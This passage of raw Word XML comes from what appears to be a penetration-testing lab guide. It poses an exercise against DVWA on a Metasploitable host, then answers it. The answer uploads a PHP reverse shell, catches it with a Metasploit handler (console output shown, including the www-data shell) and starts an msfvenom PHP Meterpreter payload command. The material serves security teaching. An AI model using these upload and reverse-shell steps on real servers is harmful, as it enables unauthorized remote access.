        <w:t>of this section is not to give information about web vulnerabilities but more to explain how these web vulnerabilities can be and are an attack vector for malicious users.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="381EEA44" w14:textId="5D36ACD7" w:rsidR="005F451C" w:rsidRPr="005F451C" w:rsidRDefault="005F451C" w:rsidP="002F7918">
      <w:pPr>
        <w:pStyle w:val="Hands-on"/>
      </w:pPr>
      <w:r>
        <w:t>HANDS ON</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26CF2C94" w14:textId="71BB5E95" w:rsidR="005F451C" w:rsidRDefault="005F451C" w:rsidP="00C6637B">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Exploit a vulnerability in the web application </w:t>
      </w:r>
      <w:r w:rsidR="00C613A8">
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="00B616D6">
        <w:t>192.168.1.10</w:t>
      </w:r>
      <w:r w:rsidR="00C613A8">
        <w:t xml:space="preserve">/dvwa) </w:t>
      </w:r>
      <w:r>
        <w:t>to get a s</w:t>
      </w:r>
      <w:r w:rsidR="00473DC2">
        <w:t>hell (either a basic shell or a</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00473DC2">
        <w:t>Meterpreter</w:t>
      </w:r>
      <w:r>
        <w:t>).</w:t>
      </w:r>
      <w:r w:rsidR="00C613A8">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="332E99F2" w14:textId="77777777" w:rsidR="0032531B" w:rsidRDefault="0032531B" w:rsidP="00C6637B">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5071312D" w14:textId="30AFC919" w:rsidR="005F451C" w:rsidRDefault="005F451C" w:rsidP="00C6637B">
      <w:pPr>
        <w:ind w:left="720" w:hanging="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Hint: The file upload</w:t>
      </w:r>
      <w:r w:rsidR="000108E9">
        <w:t xml:space="preserve"> and ping services are </w:t>
      </w:r>
      <w:r w:rsidR="00C2710D">
        <w:t>easy</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> to exploit.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64A4B7BD" w14:textId="10FEAC06" w:rsidR="00C2710D" w:rsidRDefault="00C2710D" w:rsidP="002F7918">
      <w:pPr>
        <w:pStyle w:val="Hands-on"/>
      </w:pPr>
      <w:r>
        <w:t>HANDS ON</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">  ANSWERS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CA3F0C7" w14:textId="72326D7F" w:rsidR="00981DA3" w:rsidRDefault="00981DA3" w:rsidP="006213FC">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>File upload service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02BAE751" w14:textId="151A2013" w:rsidR="006C1163" w:rsidRDefault="00A17A94" w:rsidP="002F7918">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251663360" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="227E8BF7" wp14:editId="6227AC94">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:posOffset>509905</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>366736</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3267542" cy="2666976"/>
            <wp:effectExtent l="0" t="0" r="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vwa-file-upload-servi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7542" cy="2666976"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="006C1163">
        <w:t xml:space="preserve">This service allows a user to upload a file and returns a path to it. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74618E6B" w14:textId="3B2244CA" w:rsidR="006C1163" w:rsidRPr="006C1163" w:rsidRDefault="006C1163" w:rsidP="002F7918">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4858F0D0" w14:textId="77777777" w:rsidR="00981DA3" w:rsidRDefault="00981DA3" w:rsidP="006213FC">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
      </w:pPr>
      <w:r>
        <w:t>PHP reverse shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="171B3255" w14:textId="6FF23F46" w:rsidR="00981DA3" w:rsidRDefault="00981DA3" w:rsidP="002F7918">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">First thing first, one can try to upload a file with a ‘.php’ extension and some php code to check if there is any user input validation. </w:t>
      </w:r>
      <w:r w:rsidR="00BC2F65">
        <w:t>However,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> in ‘low’ security level on this application, there is </w:t>
      </w:r>
      <w:r w:rsidR="00EE0E35">
        <w:t>none. One</w:t>
      </w:r>
      <w:r w:rsidR="00BC2F65">
        <w:t xml:space="preserve"> can easily find PHP reverse shell </w:t>
      </w:r>
      <w:r>
        <w:t>found on the internet: the one provided by PentestMonkey is correct for what need to be achieved here.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0966A765" w14:textId="77777777" w:rsidR="00981DA3" w:rsidRDefault="00981DA3" w:rsidP="002F7918">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
      <w:r>
        <w:t>Just open it with your favorite editor and change the line with ‘ip’ and ‘port’:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4230903A" w14:textId="77777777" w:rsidR="00981DA3" w:rsidRDefault="00981DA3" w:rsidP="00981DA3">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>root@kali:~/# vi php-reverse-shell.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C19E64C" w14:textId="77777777" w:rsidR="00981DA3" w:rsidRPr="008E29CD" w:rsidRDefault="00981DA3" w:rsidP="00981DA3">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   . . . </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68A4DAA8" w14:textId="73C7FA32" w:rsidR="00981DA3" w:rsidRDefault="00981DA3" w:rsidP="00981DA3">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>$ip = ‘</w:t>
      </w:r>
      <w:r w:rsidR="003224D5">
        <w:t>192.168.21.10</w:t>
      </w:r>
      <w:r>
        <w:t>’;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17655233" w14:textId="77777777" w:rsidR="00981DA3" w:rsidRDefault="00981DA3" w:rsidP="00981DA3">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>$port = 1234;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="250F28F9" w14:textId="77777777" w:rsidR="00981DA3" w:rsidRDefault="00981DA3" w:rsidP="00981DA3">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   . . .</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D1550C3" w14:textId="77777777" w:rsidR="0032531B" w:rsidRDefault="0032531B" w:rsidP="002F7918">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="51A3A602" w14:textId="36A82EB9" w:rsidR="00981DA3" w:rsidRDefault="00981DA3" w:rsidP="002F7918">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
      <w:r>
        <w:t>Upload the file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E24747E" w14:textId="0628DD33" w:rsidR="00981DA3" w:rsidRDefault="00981DA3" w:rsidP="002F7918">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>On your machine, you should now run a lis</w:t>
      </w:r>
      <w:r w:rsidR="00067025">
        <w:t>tener for the reverse TCP connect</w:t>
      </w:r>
      <w:r>
        <w:t>ion. This can be achieved using netcat but let us use Metasploit instead, as this will be useful in the next section for post-exploitation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2795D07B" w14:textId="77777777" w:rsidR="00981DA3" w:rsidRDefault="00981DA3" w:rsidP="00981DA3">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>msf &gt; use exploit/multi/handler</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="396BB5D5" w14:textId="77777777" w:rsidR="00981DA3" w:rsidRDefault="00981DA3" w:rsidP="00981DA3">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="742B7A3A" w14:textId="77777777" w:rsidR="00981DA3" w:rsidRDefault="00981DA3" w:rsidP="00981DA3">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>msf exploit(multi/handler) &gt; set PAYLOAD php/reverse_php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42FCF8B5" w14:textId="77777777" w:rsidR="00981DA3" w:rsidRDefault="00981DA3" w:rsidP="00981DA3">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>PAYLOAD =&gt; php/reverse_php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DDE187C" w14:textId="77777777" w:rsidR="00981DA3" w:rsidRDefault="00981DA3" w:rsidP="00981DA3">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4C5E39FE" w14:textId="77777777" w:rsidR="00981DA3" w:rsidRDefault="00981DA3" w:rsidP="00981DA3">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="55E3A34F" w14:textId="77777777" w:rsidR="00981DA3" w:rsidRDefault="00981DA3" w:rsidP="00981DA3">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>msf exploit(multi/handler) &gt; show options</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18FCE5F8" w14:textId="77777777" w:rsidR="00981DA3" w:rsidRDefault="00981DA3" w:rsidP="00981DA3">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="390F0D85" w14:textId="77777777" w:rsidR="00981DA3" w:rsidRDefault="00981DA3" w:rsidP="00981DA3">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Module options (exploit/multi/handler):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11868A86" w14:textId="77777777" w:rsidR="00981DA3" w:rsidRDefault="00981DA3" w:rsidP="00981DA3">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="717CFD09" w14:textId="77777777" w:rsidR="00981DA3" w:rsidRDefault="00981DA3" w:rsidP="00981DA3">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   Name  Current Setting  Required  Description</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6304319C" w14:textId="77777777" w:rsidR="00981DA3" w:rsidRDefault="00981DA3" w:rsidP="00981DA3">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   ----  ---------------  --------  -----------</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32F02AE1" w14:textId="77777777" w:rsidR="00981DA3" w:rsidRDefault="00981DA3" w:rsidP="00981DA3">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="42A9C138" w14:textId="77777777" w:rsidR="00981DA3" w:rsidRDefault="00981DA3" w:rsidP="00981DA3">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="05666620" w14:textId="77777777" w:rsidR="00981DA3" w:rsidRDefault="00981DA3" w:rsidP="00981DA3">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Payload options (php/reverse_php):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="446898DD" w14:textId="77777777" w:rsidR="00981DA3" w:rsidRDefault="00981DA3" w:rsidP="00981DA3">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7BBD3BCF" w14:textId="77777777" w:rsidR="00981DA3" w:rsidRDefault="00981DA3" w:rsidP="00981DA3">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   Name   Current Setting  Required  Description</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25AC7920" w14:textId="77777777" w:rsidR="00981DA3" w:rsidRDefault="00981DA3" w:rsidP="00981DA3">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   ----   ---------------  --------  -----------</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64AF7D17" w14:textId="77777777" w:rsidR="00981DA3" w:rsidRDefault="00981DA3" w:rsidP="00981DA3">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   LHOST                   yes       The listen address (an interface may be specified)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B5ECB99" w14:textId="77777777" w:rsidR="00981DA3" w:rsidRDefault="00981DA3" w:rsidP="00981DA3">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   LPORT  4444             yes       The listen port</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EB58A2B" w14:textId="77777777" w:rsidR="00981DA3" w:rsidRDefault="00981DA3" w:rsidP="00981DA3">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="55826870" w14:textId="77777777" w:rsidR="00981DA3" w:rsidRDefault="00981DA3" w:rsidP="00981DA3">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="06ED8235" w14:textId="77777777" w:rsidR="00981DA3" w:rsidRDefault="00981DA3" w:rsidP="00981DA3">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Exploit target:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60A8E5D9" w14:textId="77777777" w:rsidR="00981DA3" w:rsidRDefault="00981DA3" w:rsidP="00981DA3">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A869152" w14:textId="77777777" w:rsidR="00981DA3" w:rsidRDefault="00981DA3" w:rsidP="00981DA3">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   Id  Name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2781C850" w14:textId="77777777" w:rsidR="00981DA3" w:rsidRDefault="00981DA3" w:rsidP="00981DA3">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   --  ----</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38EE7084" w14:textId="77777777" w:rsidR="00981DA3" w:rsidRDefault="00981DA3" w:rsidP="00981DA3">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   0   Wildcard Target</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E5F4E6C" w14:textId="77777777" w:rsidR="00981DA3" w:rsidRDefault="00981DA3" w:rsidP="00981DA3">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1950503E" w14:textId="77777777" w:rsidR="00981DA3" w:rsidRDefault="00981DA3" w:rsidP="00981DA3">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3923072E" w14:textId="0D999AB0" w:rsidR="00981DA3" w:rsidRDefault="00981DA3" w:rsidP="00981DA3">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">msf exploit(multi/handler) &gt; set LHOST </w:t>
      </w:r>
      <w:r w:rsidR="003224D5">
        <w:t>192.168.21.10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FD75372" w14:textId="42EA7CF6" w:rsidR="00981DA3" w:rsidRDefault="00981DA3" w:rsidP="00981DA3">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">LHOST =&gt; </w:t>
      </w:r>
      <w:r w:rsidR="003224D5">
        <w:t>192.168.21.10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52A8E6D3" w14:textId="77777777" w:rsidR="00981DA3" w:rsidRDefault="00981DA3" w:rsidP="00981DA3">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="34ABFF26" w14:textId="77777777" w:rsidR="00981DA3" w:rsidRDefault="00981DA3" w:rsidP="00981DA3">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>msf exploit(multi/handler) &gt; set LPORT 1234</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45682E1F" w14:textId="77777777" w:rsidR="00981DA3" w:rsidRDefault="00981DA3" w:rsidP="00981DA3">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>LPORT =&gt; 1234</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48BE2285" w14:textId="77777777" w:rsidR="00981DA3" w:rsidRDefault="00981DA3" w:rsidP="00981DA3">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="413F1831" w14:textId="77777777" w:rsidR="00981DA3" w:rsidRDefault="00981DA3" w:rsidP="00981DA3">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">msf exploit(multi/handler) &gt; exploit </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C8FDB68" w14:textId="77777777" w:rsidR="00981DA3" w:rsidRDefault="00981DA3" w:rsidP="00981DA3">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="25E0E2D3" w14:textId="068B95BC" w:rsidR="00981DA3" w:rsidRDefault="00981DA3" w:rsidP="00981DA3">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[*] Started reverse TCP handler on </w:t>
      </w:r>
      <w:r w:rsidR="003224D5">
        <w:t>192.168.21.10</w:t>
      </w:r>
      <w:r>
        <w:t>:1234</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44CB910C" w14:textId="77777777" w:rsidR="0032531B" w:rsidRDefault="0032531B" w:rsidP="002F7918">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3F6A7B6A" w14:textId="74AF1058" w:rsidR="00981DA3" w:rsidRDefault="00981DA3" w:rsidP="002F7918">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
      <w:r>
        <w:t>Now, browse the file uploaded before and</w:t>
      </w:r>
      <w:r w:rsidR="006B7A0C">
        <w:t xml:space="preserve"> here is</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> the shell:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="730D6546" w14:textId="77777777" w:rsidR="00981DA3" w:rsidRDefault="00981DA3" w:rsidP="00981DA3">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">msf exploit(multi/handler) &gt; exploit </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63F3317A" w14:textId="77777777" w:rsidR="00981DA3" w:rsidRDefault="00981DA3" w:rsidP="00981DA3">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="03BE09B0" w14:textId="6632180A" w:rsidR="00981DA3" w:rsidRDefault="00981DA3" w:rsidP="00981DA3">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[*] Started reverse TCP handler on </w:t>
      </w:r>
      <w:r w:rsidR="003224D5">
        <w:t>192.168.21.10</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">:1234 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C865BC9" w14:textId="744F2A36" w:rsidR="00981DA3" w:rsidRDefault="00981DA3" w:rsidP="00981DA3">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] Command shell session 5 opened (</w:t>
      </w:r>
      <w:r w:rsidR="003224D5">
        <w:t>192.168.21.10</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">:1234 -&gt; </w:t>
      </w:r>
      <w:r w:rsidR="00B616D6">
        <w:t>192.168.1.10</w:t>
      </w:r>
      <w:r>
        <w:t>:39233) at 2018-06-27 13:33:51 +0200</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="397C065C" w14:textId="77777777" w:rsidR="00981DA3" w:rsidRDefault="00981DA3" w:rsidP="00981DA3">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="660CD72E" w14:textId="77777777" w:rsidR="00981DA3" w:rsidRDefault="00981DA3" w:rsidP="00981DA3">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15A7DECC" w14:textId="77777777" w:rsidR="00981DA3" w:rsidRDefault="00981DA3" w:rsidP="00981DA3">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> 16:01:37 up 20:41,  2 users,  load average: 0.00, 0.00, 0.00</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="641AFED7" w14:textId="77777777" w:rsidR="00981DA3" w:rsidRDefault="00981DA3" w:rsidP="00981DA3">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU WHAT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AAF69ED" w14:textId="77777777" w:rsidR="00981DA3" w:rsidRDefault="00981DA3" w:rsidP="00981DA3">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>msfadmin tty1     -                Mon19   20:40   0.00s  0.00s -bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="367F918C" w14:textId="77777777" w:rsidR="00981DA3" w:rsidRDefault="00981DA3" w:rsidP="00981DA3">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>root     pts/0    :0.0             Mon19   20:41   0.00s  0.00s -bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56FF89CA" w14:textId="77777777" w:rsidR="00981DA3" w:rsidRDefault="00981DA3" w:rsidP="00981DA3">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>uid=33(www-data) gid=33(www-data) groups=33(www-data)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2455F3BC" w14:textId="77777777" w:rsidR="00981DA3" w:rsidRDefault="00981DA3" w:rsidP="00981DA3">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>sh: no job control in this shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1074359D" w14:textId="77777777" w:rsidR="00981DA3" w:rsidRDefault="00981DA3" w:rsidP="00981DA3">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>sh-3.2$ id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="553971FE" w14:textId="77777777" w:rsidR="00981DA3" w:rsidRDefault="00981DA3" w:rsidP="00981DA3">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>uid=33(www-data) gid=33(www-data) groups=33(www-data)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17D712B0" w14:textId="77777777" w:rsidR="00981DA3" w:rsidRDefault="00981DA3" w:rsidP="00981DA3">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>sh-3.2$</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="505FF085" w14:textId="77777777" w:rsidR="0032531B" w:rsidRDefault="0032531B" w:rsidP="002F7918">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="30F4B59E" w14:textId="2FBC364F" w:rsidR="00981DA3" w:rsidRDefault="00981DA3" w:rsidP="002F7918">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Please notice that </w:t>
      </w:r>
      <w:r w:rsidR="00C61FEF">
        <w:t>the privileges obtained</w:t>
      </w:r>
      <w:r w:rsidR="0032531B">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">are not root here, but </w:t>
      </w:r>
      <w:r w:rsidR="0032531B">
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>www-data</w:t>
      </w:r>
      <w:r w:rsidR="0032531B">
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> instead. Privilege escalation is still to do to get root access, but this will be accomplished later.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36E83369" w14:textId="77777777" w:rsidR="00981DA3" w:rsidRDefault="00981DA3" w:rsidP="006213FC">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
      </w:pPr>
      <w:r>
        <w:t>Msfvenom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="050901CA" w14:textId="4FDC53BD" w:rsidR="00981DA3" w:rsidRDefault="00981DA3" w:rsidP="002F7918">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
      <w:r>
        <w:t>This t</w:t>
      </w:r>
      <w:r w:rsidR="00404DE5">
        <w:t>ime, we are still going to use</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> php, but to upload a M</w:t>
      </w:r>
      <w:r w:rsidR="00BC0A5F">
        <w:t>eter</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">preter payload. Msfvenom is a standalone payload generator. Given the payload, the LHOST and </w:t>
      </w:r>
      <w:r w:rsidR="00BA796E">
        <w:t>LPORT parameters</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00BC2F65">
        <w:t>it will</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00BC2F65">
        <w:t xml:space="preserve">generate </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">a standalone php file containing a </w:t>
      </w:r>
      <w:r w:rsidR="00BC2F65">
        <w:t>M</w:t>
      </w:r>
      <w:r>
        <w:t>eterpreter:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AFCF10D" w14:textId="03FB514A" w:rsidR="00C40B33" w:rsidRDefault="00C40B33" w:rsidP="00C40B33">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00C40B33">
        <w:t>root@kali:~/# msfvenom -p php/meterpreter_reverse_tcp lhost=</w:t>
      </w:r>
      <w:r w:rsidR="003224D5">
        <w:t>192.168.21.10</w:t>
      </w:r>
      <w:r w:rsidRPr="00C40B33">
        <w:t xml:space="preserve"> lport=4321 -f raw &gt; meterpreter_shell.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1271541F" w14:textId="77777777" w:rsidR="00C40B33" w:rsidRPr="00C40B33" w:rsidRDefault="00C40B33" w:rsidP="00C40B33">
      <w:pPr>
        <w:pStyle w:val="Code"/>
